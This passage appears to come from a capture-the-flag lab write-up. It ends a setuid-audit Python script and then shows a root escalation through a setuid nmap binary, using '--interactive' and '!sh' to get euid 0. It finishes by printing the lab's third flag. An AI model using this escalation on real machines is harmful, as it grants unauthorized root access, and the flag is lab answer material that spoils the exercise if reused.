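            findings.append((p, ", ".join(reasons)))
    return findings


def is_root_setuid(ls_line):
    """Parse one `ls -l` line: regular file, setuid bit in the owner-exec slot, owned by root."""
    fields = ls_line.split()
    mode, owner = fields[0], fields[2]
    return mode[0] == "-" and mode[3] in "sS" and owner == "root"


if __name__ == "__main__":
    paths, errors = parse_find_output(FIND_OUTPUT)
    print(f"{len(paths)} setuid files, {len(errors)} unreadable directories")
    for path, reason in audit_suid(paths):
        print("REVIEW:", path, "->", reason)
```

On this box the audit reduces the list to the one entry that matters, /usr/local/bin/nmap, which is both unknown to the baseline and hand-installed under /usr/local; the remediation is `chmod u-s` on it (or removing the old binary), and the same script run from cron against a stored baseline catches the next one the day it appears.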

nmap interactive

I initially looked at /usr/lib/pt_chown, but the THM hint said "nmap", and I can see it there: /usr/local/bin/nmap.

nmap has an "interactive mode" in which "! <command> -- runs shell command given in the foreground".

ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
sh
Unknown command (sh) -- press h <enter> for help
h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish. Results are printed to the
screen (of course you can still use file output commands).
! <command> -- runs shell command given in the foreground
x -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen). You should generally specify a
file for results (with -oX, -oG, or -oN). If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings. If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h -- Obtain help with Nmap syntax
h -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24

!sh
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
#

flag 3

ls /root
firstboot_done key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4